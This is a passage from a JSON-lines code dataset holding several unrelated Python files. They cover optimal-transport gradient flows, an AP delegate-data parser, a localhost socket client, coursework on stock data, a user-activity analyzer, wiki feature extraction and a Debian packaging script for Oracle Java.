torch.stack(ll).mean()\n\ndef BoMbOT(firsttensor, secondtensor, p=2, device='cpu',numbatch=4,batch_size=16,e=0):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n w = compute_Wasserstein(M, device,e=e)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device)\ndef eBoMbOT(firsttensor, secondtensor, p=2, breg=0.01,device='cpu',numbatch=4,batch_size=16,e=0):\n inds1 = []\n inds2 = []\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n w = compute_Wasserstein(M, device,e)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device,e=breg)\n\ndef mUOT(firsttensor, secondtensor, p=2, device='cpu',numbatch=4,batch_size=4,reg=1,tau=0.01):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n _,pi = solve_uot_original(M.cpu().detach().numpy().astype('float32'),np.ones(batch_size)/batch_size, np.ones(batch_size)/batch_size,tau,tau )\n pi = torch.from_numpy(pi).to(device)\n w = torch.sum(pi*M)\n ll.append(w)\n return torch.stack(ll).mean()\n\ndef BoMbUOT(firsttensor, secondtensor, p=2, device='cuda',numbatch=4,batch_size=4,reg=1,tau=0.01):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n pi = ot.unbalanced.sinkhorn_knopp_unbalanced(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), reg=reg, reg_m=tau)\n pi = torch.from_numpy(pi).to(device)\n w = torch.sum(pi * M)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device)\n\ndef mPOT(firsttensor, secondtensor, p=2, device='cuda',numbatch=4,batch_size=4,mass=0.8,e=1):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n if(e==0):\n pi= ot.partial.partial_wasserstein(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size, M.cpu().detach().numpy().astype('float32'), m=mass)\n else:\n pi = ot.partial.entropic_partial_wasserstein(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), m=mass,reg=e)\n pi = torch.from_numpy(pi).to(device)\n w = torch.sum(pi*M)\n ll.append(w)\n return torch.stack(ll).mean()\ndef BoMbPOT(firsttensor, secondtensor, p=2, device='cuda',numbatch=4,batch_size=4,mass=0.8,e=1):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n if (e == 0):\n pi = ot.partial.partial_wasserstein(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), m=mass)\n else:\n pi = ot.partial.entropic_partial_wasserstein(np.ones(batch_size) / batch_size,\n np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), m=mass, reg=e)\n pi = torch.from_numpy(pi).to(device)\n w = torch.sum(pi * M)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device)\n\nuse_cuda = torch.cuda.is_available()\ndtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\n\n###############################################\n# Display routine\n# ~~~~~~~~~~~~~~~~~\n\n\n\n\n\ndef load_image(fname):\n img = imread(fname, as_gray=True) # Grayscale\n img = (img[::-1, :]) / 255.\n return 1 - img\n\n\ndef draw_samples(fname, n, dtype=torch.FloatTensor):\n A = load_image(fname)\n xg, yg = np.meshgrid(np.linspace(0, 1, A.shape[0]), np.linspace(0, 1, A.shape[1]))\n\n grid = list(zip(xg.ravel(), yg.ravel()))\n dens = A.ravel() / A.sum()\n dots = np.array(choices(grid, dens, k=n))\n dots += (.5 / A.shape[0]) * np.random.standard_normal(dots.shape)\n\n return torch.from_numpy(dots).type(dtype)\n\n\ndef display_samples(ax, x, color):\n x_ = x.detach().cpu().numpy()\n ax.scatter(x_[:, 0], x_[:, 1], 25 * 500 / len(x_), color, edgecolors='none')\n\n\n\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\nN, M = (1000, 1000) if not use_cuda else (1000, 1000)\n\nX_i = draw_samples(\"data/density_a.png\", N, dtype)\nY_j = draw_samples(\"data/density_b.png\", M, dtype)\n\n\ndef gradient_flow(loss, lr=.001,title='m-OT',flag=False) :\n \"\"\"Flows along the gradient of the cost function, using a simple Euler scheme.\n\n Parameters:\n loss ((x_i,y_j) -> torch float number):\n Real-valued loss function.\n lr (float, default = .05):\n Learning rate, i.e. time step.\n \"\"\"\n\n # Parameters for the gradient descent\n Nsteps = int(5/lr)+1\n display_its = [int(t/lr) for t in [0, 1, 2, 3, 4, 5.]]\n\n # Use colors to identify the particles\n colors = (10*X_i[:,0]).cos() * (10*X_i[:,1]).cos()\n colors = colors.detach().cpu().numpy()\n\n # Make sure that we won't modify the reference samples\n x_i, y_j = X_i.clone(), Y_j.clone()\n\n # We're going to perform gradient descent on Loss(α, β)\n # wrt. the positions x_i of the diracs masses that make up α:\n x_i.requires_grad = True\n\n t_0 = time.time()\n plt.figure(figsize=(12,8)) ; k = 1\n for i in range(Nsteps): # Euler scheme ===============\n # Compute cost and gradient\n L_αβ = loss(x_i, y_j)\n [g] = torch.autograd.grad(L_αβ, [x_i])\n\n if i in display_its : # display\n ax = plt.subplot(1,6,k) ; k = k+1\n if(i==0):\n ax.set_ylabel(title,fontsize=11)\n plt.set_cmap(\"hsv\")\n plt.scatter( [10], [10] ) # shameless hack to prevent a slight change of axis...\n\n display_samples(ax, y_j, [(.55,.55,.95)])\n display_samples(ax, x_i, colors)\n\n ax.set_title(\"$W_2$: \"+str(np.round(compute_true_Wasserstein(x_i.cpu(),y_j.cpu())*100,4)) +r\"$\\times 10^{-2}$\",fontsize=11)\n if(flag):\n ax.set_xlabel(\"steps \"+str(i),fontsize=11)\n plt.axis([0,1,0,1])\n plt.gca().set_aspect('equal', adjustable='box')\n plt.xticks([], []); plt.yticks([], [])\n plt.tight_layout()\n\n # in-place modification of the tensor's values\n x_i.data -= lr * len(x_i) * g\n # plt.title(\"t = {:1.2f}, elapsed time: {:.2f}s/it\".format(lr*i, (time.time() - t_0)/Nsteps ))\n plt.subplots_adjust(left=0.03, bottom=0, right=0.99, top=0.91, wspace=0, hspace=0.2)\n plt.show()\n\n\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(mOT,title='m-OT')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(BoMbOT,title='BoMb-OT')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(eBoMbOT,title='eBoMb-OT',flag=True)\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(mUOT,title=r'm-UOT $\\epsilon=1, \\tau=10^{-2}$')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(BoMbUOT,title=r'BoMb-UOT $\\epsilon=1, \\tau=10^{-2}$')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(mPOT,title='m-POT s=0.8',flag=True)\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(BoMbPOT,title='BoMb-POT s=0.8',flag=True)\n\n","sub_path":"GradientFlow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592738128","text":"#!/usr/bin/env python3\nimport requests\nimport os\nimport csvkit as csv\nfrom collections import OrderedDict\n\nCANDIDATE_KEYS = OrderedDict([\n (\"O'Malley\", \"omalley\"),\n (\"Clinton\", \"clinton\"),\n (\"Sanders\", \"sanders\"),\n (\"Huckabee\", \"huckabee\"),\n (\"Cruz\", \"cruz\"),\n (\"Kasich\", \"kasich\"),\n (\"Carson\", \"carson\"),\n (\"Trump\", \"trump\"),\n (\"Rubio\", \"rubio\"),\n (\"Christie\", \"christie\"),\n (\"Bush\", \"bush\"),\n (\"Fiorina\", \"fiorina\"),\n (\"Paul\", \"paul\"),\n (\"Uncommitted\", \"uncommitted\"),\n])\n\nURL = 'https://interactives.ap.org/interactives/2016/delegate-tracker/live-data/data/delegates-delsuper.json'\nr = requests.get(URL)\nsupers = r.json()['delSuper']['del']\n\nfor party in supers:\n states = party['State']\n for state in states:\n candidates = state['Cand']\n for cand in candidates:\n cand['pTot'] = int(cand['dTot']) - int(cand['sdTot'])\n\ndem, rep = [p['State'] for p in supers]\n\nrep_dels = [dict([('state', s['sId']), ('party', 'GOP')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['pTot']) for c in s['Cand'] if c['cName'] in CANDIDATE_KEYS.keys()]) for s in rep]\ndem_dels = [dict([('state', s['sId']), ('party', 'DEM')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['pTot']) for c in s['Cand'] if c['cName'] in CANDIDATE_KEYS.keys()]) for s in dem]\n\ndem_spdel = [dict([('state', 'SPD'), ('party', 'DEM')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['sdTot']) for c in s['Cand']]) for s in [d for d in dem if d['sId'] == 'US']]\nrep_spdel = [dict([('state', 'SPD'), ('party', 'GOP')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['sdTot']) for c in s['Cand']]) for s in [d for d in rep if d['sId'] == 'US']]\n\nscript_dir_path = os.path.dirname(os.path.realpath(__file__))\noutpath = os.path.join(script_dir_path, 'delegates_ap.csv')\n\ncand_values = list(CANDIDATE_KEYS.values())\n\n# this bit is just to ensure that the fields come out in a repeatable,\n# regular order\ndef field_sorter(name):\n if name == 'party':\n return -1\n elif name == 'state':\n return -2\n else:\n return cand_values.index(name.split('_')[0])\nfieldnames = sorted(\n set(dem_dels[0].keys()).union(set(rep_dels[0].keys())),\n key=field_sorter\n)\n\ndem_spdel[0] = {k:v for k,v in dem_spdel[0].items() if k in fieldnames}\nrep_spdel[0] = {k:v for k,v in rep_spdel[0].items() if k in fieldnames}\n\ndels = dem_dels + rep_dels + dem_spdel + rep_spdel\n\nwith open(outpath, 'w+') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(dels)\n","sub_path":"data/parse_ap.py","file_name":"parse_ap.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"34964355","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-12-26 12:20:50\n# @Author : Ying Sun\n# @Link : Ying.example.com\n# @Version : 0.1\n\n#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport socket\n\nip_port = ('127.0.0.1',8002)\nsk = socket.socket()\nsk.connect(ip_port)\n\nwhile True:\n inp = raw_input('please input:')\n sk.sendall(inp)\nsk.close()","sub_path":"practice/select_client.py","file_name":"select_client.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"118669806","text":"from client_module import GameClient, timed_input\nimport sys, msvcrt\n\nkeep_playing = 'y'\n\nwhile keep_playing.lower() == 'y':\n host = input(\"Enter the host computer's IP address: \")\n port = input(\"Enter the port # being used on the host computer: \")\n client = GameClient(host, int(port))\n event = ''\n\n while event != 'server closed':\n while client.events.empty():\n continue\n event, details, time_lim, num_chars = client.events.get()\n print(event, end = '')\n if details:\n print(':', details)\n else:\n print()\n if time_lim > 0 and num_chars > 0:\n response = timed_input(\n str.format(\"Give a %d-character response within %d seconds: \"\n % (num_chars, time_lim)), time_lim, num_chars)\n client.send(response)\n\n client.stop()\n while msvcrt.kbhit(): #clears all previous keypresses\n msvcrt.getch()\n keep_playing = input(\"Play again (y/n)? \")\n","sub_path":"ClientServer/cam_client.py","file_name":"cam_client.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"454631029","text":"import numpy\n\nimport localization.sensors.base\nfrom localization.util import Measurement, StateMember\n\n\nclass Vision(localization.sensors.base.SensorBase):\n \"\"\"Simulator of the vision system.\n\n A 3-DOF sensor for linear velocity.\n The coordinates are, in order: forward, left, up.\n\n Simulator of the vision system with the ability to choose the reading\n frequency and covariance. Covariances along the first coordinate should\n preferably be set higher than the other two, since that coordinate is the\n hardest to estimate properly.\n\n Parameters\n ----------\n start_time: float\n Start time of the sensor usage, in seconds. Preferably set to 0.\n frequency: float\n Frequency of sensor responses, in Hz.\n covariance: numpy.ndarray\n A 3x3 array describing the vision covariance.\n \"\"\"\n def __init__(self, start_time, frequency, covariance):\n super(Vision, self).__init__(\n start_time, 1. / frequency, numpy.asarray(covariance),\n [StateMember.v_x, StateMember.v_y, StateMember.v_z])\n\n def generateMeasurement(self, real_state):\n \"\"\"Generate a vision measurement based on the given state.\n\n The measurement depends on the vision parameters we've set.\n\n Parameters\n ----------\n real_state: numpy.ndarray\n A 15x1 array representing the actual state.\n\n Returns\n -------\n localization.util.Measurement\n Generate a measurement with added offsets, errors and noises.\n \"\"\"\n meas = numpy.asarray(\n real_state[StateMember.v_x:StateMember.v_z+1]).reshape(3)\n meas = numpy.random.multivariate_normal(meas, self.covariance)\n meas = numpy.asarray(meas).reshape([3, 1])\n return Measurement(0., meas, self.covariance, self.update_vector)\n","sub_path":"localization/sensors/visionapprox.py","file_name":"visionapprox.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"515155845","text":"#!/usr/local/bin/python3.7\n\n# ######################################################\n# Author : < Yanjun Chen >\n# email : < chen2620 >\n# ID : < ee364f21 >\n# Date : < 9/11/2019 >\n# ######################################################\n\nimport os # List of module import statements\nimport sys # Each one on a line\nimport glob\nfrom pprint import pprint as pp\n\ndef getMonthlyVolume():\n with open('stocks.dat', 'r') as f:\n stock = f.readlines()[2:]\n\n dictionary = {}\n for allinfor in stock:\n allinfor = allinfor.split(',')\n date = allinfor[0].split('/')\n dictionary[date[0]+'/'+date[1]] = 0\n\n for allinfor in stock:\n allinfor = allinfor.split(',')\n date = allinfor[0].split('/')\n dictionary[date[0]+'/'+date[1]] += int(float(allinfor[2]))\n return dictionary\n\ndef getCommonDays(year1, year2):\n with open('stocks.dat', 'r') as f:\n stock = f.readlines()[2:]\n\n dictionary = {}\n dictionary[year1] = []\n dictionary[year2] = []\n for allinfor in stock:\n allinfor = allinfor.split(',')\n date = allinfor[0].split('/')\n if (date[0] == year1):\n dictionary[year1].append((date[1],date[2]))\n elif (date[0] == year2):\n dictionary[year2].append((date[1],date[2]))\n\n commondate = set()\n for month,date in dictionary[year1]:\n if ((month,date) in dictionary[year2]):\n commondate.add((month,date))\n return commondate\n\ndef getNamesBySymbol(n):\n with open('transactions.dat', 'r') as f:\n transactions = f.readlines()\n\n dictionary = {}\n for transaction in transactions:\n transaction = transaction.split(': ')\n companys = transaction[1].split('\\n')\n companys = companys[0].split(', ')\n for company in companys:\n dictionary[company] = set()\n\n for transaction in transactions:\n transaction = transaction.split(': ')\n companys = transaction[1].split('\\n')\n companys = companys[0].split(', ')\n for company in companys:\n if (companys.count(company) >= n):\n dictionary[company].add(transaction[0])\n\n return dictionary\n\n# # ######################################################\nif __name__ == \"__main__\":\n #problem 1\n #pp(getMonthlyVolume())\n\n #problem 2\n #setvalue = getCommonDays(\"2018\",\"2017\")\n #pp(setvalue)\n #print(len(setvalue))\n\n #bouns\n #pp(getNamesBySymbol(1))\n pass","sub_path":"ECE364SoftwareEngineeringToolsLab/Lab03/Lab03Module.py","file_name":"Lab03Module.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"388430708","text":"import hospital\r\n#Вышла ошибочка и я сделал 5.1.22 вместо 5.1.23, было бы очень класно если можно не переделывать\r\n\r\n\r\ndef main():\r\n hos = hospital.Hospital(0)\r\n recruits = [[11], [10], [1, \"It's me\"], [12], [20, \"Retard\"], [11]] # Массив посетителей\r\n max_time = 1000 # Структура такая: (time [,name])\r\n\r\n for t in range(max_time):\r\n for i in recruits:\r\n if i[0] == t:\r\n hos.add_visitor(*i)\r\n\r\n hos.tick_time() # Время тикает и моделируется каждый миг\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n# Времени потрачено на создание: ~4 часа (не знаю куда это писать)\r\n","sub_path":"Lab5/Lab5_1_22.py","file_name":"Lab5_1_22.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159913675","text":"import json\nimport random\nimport math\n\n\nclass Anomaly:\n barrier_value = 0.19 # empirically derived\n\n def get_abnormal_users(users, days_observed):\n return [user_id for user_id, activity in users.items() if Anomaly.abnormal_activity(activity, days_observed)]\n\n def abnormal_activity(activity, days_observed):\n min_val = min(activity)\n return math.sqrt(sum((x - min_val) ** 2 for x in activity)) / \\\n math.sqrt(days_observed**2 * len(activity)) < Anomaly.barrier_value\n\n\nclass Correlation:\n def get_correlation_table(users, days_observed):\n table = {}\n for user1_id, user1_activity in users.items():\n table[user1_id] = {}\n for user2_id, user2_activity in users.items():\n table[user1_id][user2_id] = Correlation.get_correlation(user1_activity, user2_activity, days_observed)\n return table\n\n def get_correlation(data1, data2, days_observed):\n max_val = math.sqrt(sum(max(x, y, days_observed - x, days_observed - y)**2 for x,y in zip(data1, data2)))\n return 1 - math.sqrt(sum((x - y) ** 2 for x,y in zip(data1, data2))) / max_val\n\n def get_best_pair(cor_table):\n b_pair = ()\n b_value = 0\n for user1_id in cor_table.keys():\n for user2_id, cor_value in cor_table[user1_id].items():\n if user1_id != user2_id and cor_value > b_value:\n b_value = cor_value\n b_pair = (user1_id, user2_id)\n return b_pair\n\n def get_pair_value(table, pair):\n return table[pair[0]][pair[1]]\n\n\nclass Meals:\n breakfast_fun = [0.15, 0.3, 0.7, 1.0, 0.6, 0.27, 0.13]\n breakf_to_din = (3, 5)\n dinner_fun = [0.04, 0.2, 0.6, 0.9, 1.0, 0.9, 0.6, 0.2, 0.04]\n dinner_to_sup = (4, 6)\n supper_fun = [0.1, 0.3, 0.8, 1.0, 0.8, 0.6, 0.2]\n\n def get_meal_times(users, days_observed):\n meal_times = {}\n for user_id, user_activity in users.items():\n meal_times[user_id] = Meals.get_meals(user_activity, days_observed)\n return meal_times\n\n def range_h(diff_to, offset):\n return range(offset + diff_to[0] * 60 // 15, offset + diff_to[1] * 60 // 15)\n\n def get_meals(activity_data, days_observed):\n n = len(activity_data)\n activity_data = activity_data + activity_data\n res = ((0, 0), (0, 0), (0, 0))\n res_val = -1\n for bf_st in range(n):\n dinner_range = Meals.range_h(Meals.breakf_to_din, bf_st)\n for dn_st in dinner_range:\n supper_range = Meals.range_h(Meals.dinner_to_sup, dn_st)\n for sup_st in supper_range:\n bf_val = Meals.get_fun_val(activity_data[bf_st:], Meals.breakfast_fun, days_observed)\n dn_val = Meals.get_fun_val(activity_data[dn_st:], Meals.dinner_fun, days_observed)\n sup_val = Meals.get_fun_val(activity_data[sup_st:], Meals.supper_fun, days_observed)\n\n fun_val = bf_val + dn_val + sup_val\n if res_val == -1 or fun_val < res_val:\n res_val = fun_val\n bf_bounds = Meals.get_meal_bounds(bf_st, activity_data[bf_st:], Meals.breakfast_fun, days_observed)\n dn_bounds = Meals.get_meal_bounds(dn_st, activity_data[dn_st:], Meals.dinner_fun, days_observed)\n sup_bounds = Meals.get_meal_bounds(sup_st, activity_data[sup_st:], Meals.supper_fun, days_observed)\n res = (bf_bounds, dn_bounds, sup_bounds)\n\n return res\n\n def get_fun_val(data_slice, meal_fun, days_observed):\n return math.sqrt(sum((x / days_observed - y)**2 for x, y in zip(data_slice, meal_fun)))\n\n def get_meal_bounds(st, data_slice, meal_fun, days_observed):\n data_slice = data_slice[:len(meal_fun)]\n l = len(meal_fun) // 2\n r = l\n sum_cur, sum_all = data_slice[l], sum(data_slice)\n while True:\n if sum_cur >= sum_all * 0.6 or (l == 0 and r == len(data_slice) - 1):\n break\n if l > 0 and (r == len(data_slice) - 1 or data_slice[r + 1] < data_slice[l]):\n sum_cur += data_slice[l - 1]\n l -= 1\n else:\n sum_cur += data_slice[r + 1]\n r += 1\n\n return ((l + st) % (24 * 60 // 15), (r + st) % (24 * 60 // 15))\n\n def get_time_segm(meal_t, time_segments):\n return (time_segments[meal_t[0]], time_segments[meal_t[1]])\n\n def get_time_segms(meal_tms, time_segments):\n return (Meals.get_time_segm(meal_tms[0], time_segments), Meals.get_time_segm(meal_tms[1], time_segments), \\\n Meals.get_time_segm(meal_tms[2], time_segments))\n\n\nclass FocusTime:\n focus_fun = [0.35, 0.3, 0.23, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, \\\n 0.3, 0.5, 0.7, 1.0, 0.7, 0.5, 0.3, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.23, 0.3, 0.35]\n\n def get_focus_times(users, days_observed):\n focus_times = {}\n for user_id, user_activity in users.items():\n focus_times[user_id] = FocusTime.get_focus(user_activity, days_observed)\n return focus_times\n\n def get_focus(activity_data, days_observed):\n n = len(activity_data)\n activity_data *= 2\n res = []\n res_val = -1\n for st in range(n):\n cur_val = FocusTime.get_fun_val(activity_data[st:], FocusTime.focus_fun, days_observed)\n if res_val == -1 or cur_val < res_val:\n res_val = cur_val\n res = FocusTime.get_bounds(st, activity_data[st:], FocusTime.focus_fun, days_observed)\n return res\n\n def get_fun_val(data_slice, focus_fun, days_observed):\n return math.sqrt(sum([(x / days_observed - y)**2 for x, y in zip(data_slice, focus_fun)]))\n\n def get_bounds(st, data_slice, focus_fun, days_observed):\n res = []\n i = 0\n while i < len(focus_fun):\n if focus_fun[i] <= 0.3:\n j = i\n while j < len(focus_fun) and focus_fun[j] <= 0.3:\n j += 1\n res.append(((st + i) % 96, (st + j) % 96))\n i = j\n else:\n i += 1\n return res\n\n def get_time_segms(meal_tms, time_segments):\n res = []\n for x in meal_tms:\n res.append((time_segments[x[0]], time_segments[x[1]]))\n return res\n\n\nuser_data = []\nwith open(\"data_reduced.json\", \"r\") as dfile:\n user_data = json.loads(''.join(dfile.readlines()))\n\ntime_segments = list(user_data[0]['activity_data'].keys())\ndays_observed = user_data[0]['days_observed']\nusers = {}\nfor user in user_data:\n users[user['id']] = list(user['activity_data'].values())\n\nan_users = Anomaly.get_abnormal_users(users, days_observed)\nprint(\"Anomaly users:\", an_users)\n# delete anomaly observations\nfor id in an_users:\n del users[id]\n\ncor_table = Correlation.get_correlation_table(users, days_observed)\nbest_pair = Correlation.get_best_pair(cor_table)\nprint(\"Best team pair:\", best_pair, Correlation.get_pair_value(cor_table, best_pair))\n\nmeal_times = Meals.get_meal_times(users, days_observed)\nfor id in users.keys():\n meal_time = meal_times[id]\n meal_time = Meals.get_time_segms(meal_time, time_segments)\n print(\"Id:\", id, \"Breakfast:\", meal_time[0], \"Dinner:\", meal_time[1], \"Supper:\", meal_time[2])\n\nfocus_times = FocusTime.get_focus_times(users, days_observed)\nfor id in users.keys():\n focus_time = focus_times[id]\n focus_time = FocusTime.get_time_segms(focus_time, time_segments)\n print(\"Id\", id, \"Focus:\", focus_time)\n","sub_path":"modelling/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40177716","text":"import os\nimport sys\nimport re\nsys.path.append(os.path.abspath('../../'))\nfrom utils.wiki import *\n\nif __name__ == \"__main__\":\n folder = '../../../test/cgl/'\n fname = 'iit_cs'\n wiki2id = dict()\n # load nodes\n with open(folder + fname + '.wikis') as f:\n k = 1\n for line in f:\n wiki2id[line.strip()] = k\n k += 1\n # load vocabulary\n wd2id = dict()\n with open(folder + fname + '.vocab') as f:\n for line in f:\n s = line.strip().split('\\t')\n wd2id[s[0]] = int(s[1])\n\n # write X\n with open(folder + fname + '.x', 'w') as f:\n for wiki in wiki2id:\n wikitext = get_wikitext(wiki, update_cache=0, exbody=True)\n matches = re.findall('\\[\\[(.+?)\\]\\]', wikitext)\n tf = dict()\n for match in matches:\n s = match.split('|')\n if len(s) > 2:\n continue\n link = s[0].strip().lower()\n if link in wd2id:\n wid = wd2id[link]\n tf[wid] = tf.get(wid, 0) + 1\n for wid in tf:\n f.write('{} {} {}\\n'.format(wiki2id[wiki], wid, tf[wid]))\n\n # write y\n with open(folder + fname + '.y', 'w') as out:\n with open(folder + fname + '.edges') as f:\n for line in f:\n s = line.strip().split('\\t')\n out.write('{} {}\\n'.format(wiki2id[s[0]], wiki2id[s[1]]))\n","sub_path":"src/cgl/preprocess/dataPreparation.py","file_name":"dataPreparation.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"119639361","text":"#!/usr/bin/env python\nimport email.utils\nimport logging\nimport os\nimport pathlib\nimport subprocess\nimport sys\nimport yaml\n\nmaintainer = os.environ['MAINTAINER']\nmajor = int(os.environ['MAJOR'])\nversion = os.environ['VERSION']\nrevision = int(os.environ['REVISION'])\nchangelog = 'upstream release' if revision == 1 else 'improve packaging'\nwith open(f'jdk{major}/package.yml') as f:\n d = yaml.safe_load(f)\n priority = d['priority']\n jinfo_ignore = frozenset(d.get('jinfo-ignore') or [])\n packages = d['packages']\n del d\n\narch = 'amd64'\npackage_name_prefix = f'oracle-java-{major}'\njvm_name = f'oracle-java-{major}-{arch}'\njvm_prefix = pathlib.Path('usr/lib/jvm')\njvm = jvm_prefix / jvm_name\njinfo_path = pathlib.Path(f'debian/{package_name_prefix}-jre-headless/{jvm_prefix}/.{jvm_name}.jinfo')\ncacerts = 'jre/lib/security/cacerts' if major == 8 else 'lib/security/cacerts'\nsrc = pathlib.Path('debian/tmp')\n\ndef find(cmd):\n text = subprocess.check_output(cmd, cwd=src, shell=True, text=True).strip('\\0')\n if not text:\n return []\n return text.split('\\0')\n\ndef prepare():\n global executables\n global empty_directories\n\n ## rename cacerts\n (src/cacerts).rename(src/f'{cacerts}.oracle')\n\n ## find all executables\n executables = set(find(r'find . -type f -perm /111 -printf \"%P\\0\" | sort -z'))\n\n ## find all empty directories\n empty_directories = set(find(r'find . -type d -empty -printf \"%P\\0\" | sort -z'))\n\n ## generate debian/control\n with open('debian/control', 'w') as control:\n control.write(f'''\\\nSource: {package_name_prefix}\nSection: java\nPriority: optional\nMaintainer: {maintainer}\nBuild-Depends: debhelper (>= 9)\n''')\n for package_name in packages:\n with open(f'debian/{package_name}.control') as package_control:\n data = package_control.read().replace('%prefix%', package_name_prefix)\n control.write(f'''\\\n\nPackage: {package_name_prefix}-{package_name}\n{data}''')\n\n ## generate debian/changelog\n pathlib.Path('debian/changelog').write_text(f'''\\\n{package_name_prefix} ({version}-{revision}) unstable; urgency=low\n\n * {changelog}\n\n -- {maintainer} {email.utils.formatdate()}\n''')\n\n ## generate jinfo header\n jinfo_path.parent.mkdir(mode=0o755, parents=True)\n jinfo_path.write_text(f'''\\\nname={package_name_prefix}\npriority={priority}\n\n''')\n\ndef move(src, dst):\n assert not dst.exists(), dst\n dst.parent.mkdir(mode=0o755, parents=True, exist_ok=True)\n src.rename(dst)\n\ndef process(package_name, meta):\n dst = pathlib.Path(f'debian/{package_name_prefix}-{package_name}/{jvm}')\n\n for path in meta.get('files') or []:\n src_path = src/path\n if path.endswith('/'):\n assert src_path.is_dir(), path\n else:\n assert src_path.is_file() or src_path.is_symlink(), path\n move(src_path, dst/path)\n\n purge = set()\n for path in empty_directories:\n if (dst/path).is_dir():\n purge.add(path)\n empty_directories.difference_update(purge)\n\n substvars(package_name=package_name, meta=meta)\n\n if package_name == 'cacerts':\n path = 